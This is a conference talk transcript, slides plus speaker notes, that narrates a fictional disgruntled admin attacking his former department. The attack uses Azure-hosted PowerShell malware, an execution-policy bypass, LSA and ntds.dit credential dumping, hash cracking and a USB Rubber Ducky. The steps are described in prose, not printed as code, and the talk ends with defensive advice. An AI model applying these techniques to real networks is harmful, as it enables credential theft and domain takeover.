1. Windows Azure and PowerShell powered malware By Kieran Jacobsen
What!
Hello everyone, my name is Kieran Jacobsen, I work for HP Enterprise Services as an Application Engineer, I actually started there almost 12 months ago, just a week before the last infrastructure Saturday.
This presentation is simply titled, What!. It is a simple title, and sums up what most people will exclaim when discovering malware on a computer system. How many of you have found malware and exclaimed, WTF? what the hell? What?
The am for this session is for you to gain some ideas on how someone could get malware into your network, escalate their access and their privileges, and then finally cause some serious damage. The example covered today is an insider threat, but a lot of what is covered is related to APT or advanced persistent threats, and of course, the emerging hacktivist threats.
Windows Azure and PowerShell powered malware
By Kieran Jacobsen

2. The following story is fictional and does not depict any actual person or event. Although inspired by true events, the network, people and company described are completely fictional.
Whilst the source code shown today is publicly available, I hold no responsibility for any loss or damage that may arise from you using or manipulating the source code.
Everyone involved in this presentation are trained IT Professionals, so please, don’t try this at home!
Malware IS DANGEROUS
I am adding some disclaimers here.
The scenario described today is based up a number of past experiences as well as some of other it professionals. The network in use probably resembles thousands of IT environments around the world, it doesn’t reflect on anyone specifically.
Be careful with my source code, it can be very dangerous, the source code is on github. If you infect your machine with it, and it talks to my C and C infrastructure, it could end up running malicious commands, the C and C will be down by the end of the day, but I am still going to warn you all. I really hope you will all go and take a look at code and look at the information I have posted up.
Now that I have the disclaimer out of the way, let’s get on with the presentation.

3. The Bad Guy
Name: Boris
Previous Title: System Queensland Department of Widget Management
Technical Skills:
PowerShell
Group Policy
Windows Azure
some hacking knowledge
Meet, Boris, hopefully you recognise him from GoldenEye.
Boris was working for the Queensland Department of Widget Management as a system administrator, who unfortunately had to lay some staff off due to the cutbacks. Boris was selected to go, this has made him angry, very angry, he has sworn revenge against the department and his former colleagues.
If you look at his technical skills, he is like any other IT professional, another thing to note is he went to teched, where picked up some cloud skills and new powershell skills.
So bent on revenge, he goes off and writes some malware.

4. The Malware Written in PowerShell IT IS VERY OBVIOUS!
Signed by SSL Certificate issued by 3rd Party Root Authority
A machine is considered infected when:
C:\Infected contains required files
Drive infection scheduled task is running
C&C scheduled task is running
Command and Control is cloud based, uses Windows Azure VM Role
Windows Server 2012 with IIS and WebDAV
Boris has decided to use PowerShell for the entirety of his malware. For malware, his is pretty obvious, during the infection process, its obvious something bad is happening, once infected, all the files for the malware are stored in a directory called infected.
The PowerShell scripts for the malware are signed, that is, they have Authenticode signatures. Boris has a code signing certificate, it is issued by a 3rd party authority which the departments systems trust. We will talk about the signing later on.
A Machine is considered infected, when there is a folder on the system drive called infected containing the various files needed for the malware, and the scheduled task for communicating with the command and control infrastructure has been created. If everything works, and the victims pc talks successfully with the command and control infrastructure, then a picture of boris will appear in the programdata folder.
Now you probably have probably heard about cloud and azure quite a bit today, and thought I wouldn’t be mentioning it here, your wrong. We are hosting the command and control infrastructure on Azure using the VM worker role.

5. The Malware: Infect-WebPC.ps1
Infects a client
Clients download and execute script
Downloads other files for infection, creates scheduled tasks to communicate with Command and Control
Infect-webpc.ps1 is the script that does all the naughty work, infecting users computers. Boris will socially engineer victims to run this script, once it is run it will download other files and setup scheduled tasks to talk to the command and control server.

6. The Malware: Invoke-CandC.ps1
Runs as scheduled task
Uploads “registration” file to Command and Control server, file contains running processes and services
Gets “Commands” from Command and Control server, filters out tasks previously run, or those not destined to run on host
Runs each command using invoke-expression
Commands can be executable or any PowerShell command
Invoke-CandC.ps1 is the most important script of them all. It is run as a scheduled task, as the system user, and it does all of the work today.
When executed, it uploads details of the victim pc to the command and control server, such as the services and running processes. It will then get a list of commands from the candc server.
A particular command will only ever be run once, if it fails to run, it will be tried again later.
Boris can filter commands to run on specific victim computers, allowing boris to perform specific commands and attacks on specific computers.
Commands are anything valid powershell expression. The expression could be an executable or powershell script.

7. A Quick Note: Code Signing
Authenticode/Code Signing only ensures us of the authenticity and integrity of the signed file/script/executable
Does not prove good intentions
Due to Crypto basis, more trusted by technically minded users
Many sources of abuse:
Forgery
Deception
Theft
See Also:
abused-to-sign-5000-malware-apps/
This is the first of two technical notes in this presentation, and I just briefly want to talk about code signing.
You have to realise that Authenticode, or code signing only ensures the authenticity and integrity of what it is protecting, that is the application or script. It is merely a grantee of the origin, not perfect proof of the origin, but more importantly it is a guarantee that the code has not been tampered with. No where does it authenticate that the author only had good intentions, it does not protect against authors with malicious intentions. There is a common misconception that it is more trustworthy than an unsigned piece of code, and this raises the issues that users, even those who are very technically minded, who might ignore other obvious warning signs. This over trust of signing extends to antivirus companies who are known to skip scanning signed files!
There are many ways to abuse the Authenticode/code signing systems we have in place, methods include: copying signing information, using self signed certs, forging the md5 sums or using collisions, getting some sucker to sign it, stealing a signing cert, compromising someone else's signing infrastructure, this is something that recently occurred to Adobe, finally we could simply spend the money, buy a cert and be evil with it.
I am not saying we should ditch this, but we need to improve the situation.
Lets get back to the scenario.

8. The Network Simple, flat network
Limited outbound protocols allowed, HTTP, HTTPS, DNS
Single Windows Server 2012, running DC and File and Print
Windows 7 SOE
All users local administrators
UAC was disabled due to an application compatibility issue
VNC runs on all machines, as a service account –which is a domain admin
The department has a very simple network, they have a pfsense firewall filtering their outbound internet, it only allows HTTP, HTTPS and DNS out. It doesn’t provide any url scanning or filtering and doesn’t log anything.
There is a single windows 2012 server running DC and file and print services.
The standard operating environment at the department is Windows 7, all users have local admin on their PCs, and UAC was disabled due to application compatibility issues.
There is a “management service”, tight vnc server, running as a service account on every workstation, unfortunately the account is a member o f domain admins. We all know this shouldn’t be happening, but in a lot of environments system centre or what ever monitoring or management tool is running will either have quite high privileges or be running as a domain admin.

9. What Boris Knows Usernames, computer names, IP addressing…
Security and Firewall policies
That passwords have all been changed
Group Policy restrictions – PowerShell Execution Policies
Personal details of those remaining
addresses
Pets and favourite animals
Hobbies and interests
So what does Boris know of his target?
Well he worked there, so he knows a lot, quite a scary amount, but it really only gives him a slight advantage.
He knows all the simple things, usernames, computer and server names, etc.
He also knows quite a lot about how his victim will respond to an attack, he knows the security, password and firewall policies. In the department, they change all of the passwords when someone leaves. Because they have a simple network, they achieve a 100% password change. This is something that most organisations do not achieve, either because of laziness, fear, or incompetence. The biggest excuse with this one is something might break if we change the password.
Boris worked on the Windows 7 SOE, he knows how the workstation environment works. In particular the group policy in use and what PowerShell execution policies have been configured on each workstation.
The last thing, is that he knows his former colleagues. He knows their addresses, personal lives or at least parts of their personal lives, he knows what they like and disk like, their pets and favourite animals, their hobbies and interests. Unlike an outside, Boris doesn’t have to spend time researching his targets, he got all the information he needs simply from turning up to work. He will use this knowledge to perform social engineering attacks on his former colleagues

10. The Plan of Attack Infect previous co-workers
Alice: His former Boss
Bob: The co-worker he didn’t like
Eve: The paranoid security administrator
Jane: The C-Level exec
Get a Domain Admin account username and password ?
Profit!
So what is Boris’ plan of attack.
Step 1, get his malware onto as many end user workstations as possible. Do this by sending specially crafted spear phishing s to each victim, convince them to run the infect-webpc script. Each victim might need some different stratergies. One intended victim, Jane, doesn’t use ! Boris is going to need something special to infect her PC.
Step 2, get a domain admin account. Boris knows that tight vnc is installed on all of the workstations, and that it is running as a user account, and that account is a domain admin. He needs that password!
Step 3, something
Step 4, profit!

11. A Quick note: PowerShell Execution Policies
There are 6 states for the execution policy
Unrestricted All scripts can run
Remote Signed No unsigned scripts from the Internet can run
All Signed No unsigned scripts can run
Restricted No scripts are allowed to run
Undefined (Default) If no policy defined, then default to restricted
Bypass Policy processor is bypassed
Here is the second of the technical notes, lets tall execution policies.
As you all know, the execution of Powershell scripts is governed by the execution policy. This policy has 6 different states.
First we have unrestricted, this is the least secure state and allows us to run any script, no matter where it came from. Then we have remote signed, with remote signed, if a script came from a source other than the local pc, it must be signed; any script from say the internet, which is signed, will be executed. Then we have all signed, here we will not run any script, no matter the source, unless it has been signed. Then there is restricted, in this state, no scripts can run.
There are two special states, undefined, which is the policy if none has been set, this actually defaults to the restricted policy, and finally bypass, which is primarily used when calling PowerShell scripts from applications, in bypass the policy processer is, well, bypassed.
Another important note, you can depending on where the policy has been set, override the active policy with one of your own choosing. This is dependant on how the policy was set though.
Lets go to some demos.

12. Demo: Boris infects Alice’s PC
Alice was Boris’ manager. Out of everyone in the department, Boris knows she will be an easy target.
During the windows 7 project, she managed to convice people that she didn’t need any group policy applied, this means that her powershell signing policy will be undefined and hence restricted.
Let’s go an look at her execution policy. * Show get-executionpolicy –list * as you can see, she has no policy defined, which means she really has *show get-executionpolicy * which is restricted as her policy.
Boris sends her the targeted , something about a dancing cat. She runs the code he copied in. *Show and then run code*
This code is simply downloading and running a script, when we run powershell using command we are telling powershell to use an execution policy of unrestricted, we can do this, as there is no group policy enforcing a execution policy.
You can see the machine has checked in, and processed some commands * show boris image, and the checkin file *
* Save Alice PC state and power on bobs pc*
To the next victim, Bob.

13. Demo: Boris infects Bob’s PC
Bob is the next victim, unlike Alice he has the default company policy of remote signed PowerShell scripts, not that it helps him. Remember I mentioned that Boris has a signing certificate! Just to show you I am not lying, here is the policy *show get-executionpolicy –list*
Bob got an from Boris, this time about an easter egg in Windows 7, the code is more simple this time as we don’t need to specify an execution policy, as well, remote signing works perfectly for us. *show and then running the code *
You can see the machine has checked in, and processed some commands * show boris image, and the checkin file *
Things are not going well for the department, lets look at eves pc
*save state of bob’s pc, start eves*

14. Demo: Boris infects Eve’s PC
Eve is the next candidate, she has a policy enforcing the restricted execution policy. This isn’t going to help. Just to check, here is the policy *show execution policy *
Bori’s sends here an , about a kitten, and she of course runs this rather large chunk of code *show and code execution*, once again it has checked in and we have an image of boris on the system *show image *
*save eve, power on alice *

15. Code: Bypassing Restricted Execution Policy
Before we go any futher, I want to explain the code EVE just ran.
*show primalscript window*
Just like previously, we are asking powershell to download the script, but this time we are reading the script file, and then performing some very interesting things, we filter out comments, re arrange the entire script into a single line and then use invoke-expression, why are we doing all of this? Well, if you do this, Windows and powershell think you are running commands and not a script, hence, that restricted execution policy is useless.
The scheduled tasks on all of the machines are performing similar things to this, just to ensure nothing stops them from running.

16. Demo: Boris gets a domain admin username and password
We are now going to go back to Alice’s PC, from here Boris will perform some privilege escalation activities.
Boris as we said earlier, knows that there is the tight vnc service on the workstations, and he knows it is running under an account which is a member of the domain admins. He knows this account is If he didn’t it would only take a few minutes to find it out, if I had time, I would have shown you how easy this is. For an attacker, finding which services are running under user accounts is very simple, but not very exciting. Onward to the cool part of this demo.
Boris decides to use a very nifty tool called PWDUMPX, this tool can be found online, and allows use to dump a number of different password storage locations in Windows, the one that boris is after is the LSA store, becausethats where passwords for services are stored.
He will put the following commands into the candc command list
*show commands on c and c server*
What we are doing is getting alices pc to download the application and its dependencies, and run the application, it will then upload the file we need which has the password in it
*add files to c and c command list, switch to alices pc*
Just going to disable the c and c task, and switch to an unrestricted policy, I am doing this to save some time. I will then invoke the cand c manually so you can watch it performing the tasks at hand.
*once complete, show upload files *
So we have the file, and if we look in it, scrolling to the bottom, we see tvnc and there is this text filled with dots beside it, well that text, minus all the full stops, is the password for the login as service, so now we have a username, vnc, and a password S3rvice.
Boris is going quite well. Now lets see if we can use this domain admin user and get access to the domain controller for the department.

17. Demo: Demo infects the server
It would be hard for boris to get one of his collegues to run cone on the domain controller for him, like they did on their workstations, but he really doesn’t need them to. He already has domain admin, all he needs to do is copy the infection files to the server, something he can do with windows file sharing, and then get the scheduled tasks run, which he can also do. Schtasks which the infection process uses to create the local tasks works well over the network, the script boris wrote to infect his original victims only needs a minor bit of modification to make it target a remote machine.
Lets head back to the candc server, lets look at these commands, *switch to c and c*, here we can see that there are downloading a powershell script, and then running it, specifying the username and password we found earlier, and the remote host name we wish to target. *place commands in candc file*
Lets go back to alice’s pc and invoke the command and control *invoke c and c on alice*
Lets check in and see if we have been successful *go back to c and c and wait for checking*
And now, we have access to the domain controller! Boris has come quite a long way.

18. Demo: Boris cracks open AD
What can boris do with this new found access? How about getting some additional user accounts? If we could get a dump of the password hashes form AD, then we could crack those hashes. Firstly, we need a copy of the ntds.dit file we can access, that’s easy, VSS and ntdsutil will help us there, then we need to get a dump of those hashes for that we will use quarks pw dump. Finally we need to crack the hashes, lets use cloudcracker.com to do that.
Here is some commands for the command and control that I prepared earlier.
*show c and c commands quark.txt*
There is quite a few here, so lets quickly run through them, we begin by getting a copy of quarkspwdump onto the server, we then make a vss snapshot and copy ntds.dit, and the remove the snapshot. We will then run quarks against the database copy. Once that is done, upload the results to the candc server.
*disable scheduled task on server, invoke c and c on the server *
*switch to c anc c and show the upload *
Now we need to crack those hashes, lets open up a browser and go to cloudcracker.com *show them cloud cracker*

19. Cloud Cracker Results
I have some results I prepared earlier, its interesting to see that we didn’t get as many passwords as I hoped, but we did get a few, one we already knew, but now we know a few more.
We can see that Boris got the administrator account password, and bobs password. I am perplexed that Alice and eve’s passwords were not
Boris can now do what ever the hell he wants. Mission complete.
I have one more interesting demo to show you before we finish…

20. Malicious HID Devices
HID: Human Interface Device, examples generally include mice keyboards, fingerprint readers, joysticks, webcams, gamepads
Device shown today: Hak5 USB Rubber Duckie
Retails for: USD 60
Contains Micro SD storage card and 60MHz CPU
When placed in plastic case, will appear like any other USB device
Appears as a HID Keyboard – Bypassing USB Storage controls
Simple programming language, can do anything you could do with a keyboard
Cross Platform
Let’s talk malicious HID devices. HID, or human interface devices are found all over the work place, they are our USB keyboards, mice and webcams. Their drivers are universal and included in Windows, Mac and Linux. A Malicious HID device is one which has been programmed to act like one type of HID device, say a keyboard, but in reality is far from it.
For today’s presentation, I am using a programmable HID device produced by the Hak5 team, which goes by the name, USB Rubber Duckie. The duckie isn’t an ordinary HID, it features a micro SD card, and 60MHz processor and is backed by a very simple scripting language. All of this is packed into a small plastic case which makes it easily confused with a normal USB thumb drive. The scripting language allows you to do anything a keyboard can do, from stealing data, opening backdoors or downloading and running executables and scripts.

21. Demo: Boris goes for complete domination, infects Jane’s PC
As I mentioned earlier, there was one more intended victim of Boris, Jane. Jane does’t read , but she is known to be a collector of USB thumb drives. She buys them when they are on special, and is always getting one as a gift at a conference or in the mail. She is even known to find them on the street. Boris will use this to his advantage. Let’s assume he has either sent a usb thumb drive to jane, packaged as a fake gift from a vendor, or perhaps left it somewhere where she will find it. Naturally, she will plug it in to her computer.
For the demo I will be using this PC here, the teched netbook, which is set up in a similar fashion as the departments pcs.
*plug duckie in and go*
Look ma, no hands…
*show this pc as infected (show boris image) *
Cool or what?

22. So what do we do?
Boris never made a connection to the network, it always connected to his PC
Boris could have easily done this with a significant level of anonymity
PowerShell Execution Policies
URL White Listing
Application White Listing
filtering
USB Device Control
Solution: User Education
My final slide before questions.
So what do we do? Well, I need to first point out that boris never made a connection into the departments network, he could have easily done this with a significant amount of privacy/anonymity, that it would have been difficult to find the culprit. Of course, he did use his personal address, but he could have easily used some other social engineering tactic.
Enforcing a powershell execution policy might be your best bet. When I was working on this presentation, the only policy that gave me some difficulty was the all signed. With allsigned enabled, users get prompted when they run a script from an unknown script publisher, even if the publisher is using a trusted certificate. This is probably the best defence against the “dark arts” but the method I used to bypass the restricted policy should also work here, I just ran out of time.
Enforcing a powershell execution policy can break your own scripts, or require you to sign all of your scripts. You could block powershell from executing, but I suspect that would make it harder for you to manage your environment in the long term.
White listing the URLs users can go to, and the applications they run will help, but there are ways of bypassing those as well. Besides, I only used two .exe files for the entire demo, the rest of the time was powershell scripts and expressions.
filtering isn’t going to help, if Boris realised his s were not getting through, he would have found another way.
USB device management software and systems would also not help protect Jane, they will also allow a USB keyboard to work, and after all that is what she plugged in to her computer.
The real solution is user education, users need to be more aware of what they click on and run in their and be more aware that usb devices are dangerous.

23. Questions? More Info… Website: http://aperturescience.su
Twitter: @kjacobsen
GitHub Project:
Tools:
PwdumpX:
Quarks PW Dump:
Cloudcracker.com:
Usb rubber duckie:
Hak5:
So we have reached the end of this presentation.
I would like to thank you all for attending, please fill out the feedback forms.
I have a number of important links on this slide, my website, aperture science dot su, my twitter handle, my address, links to the github project as well as links to the tools in use.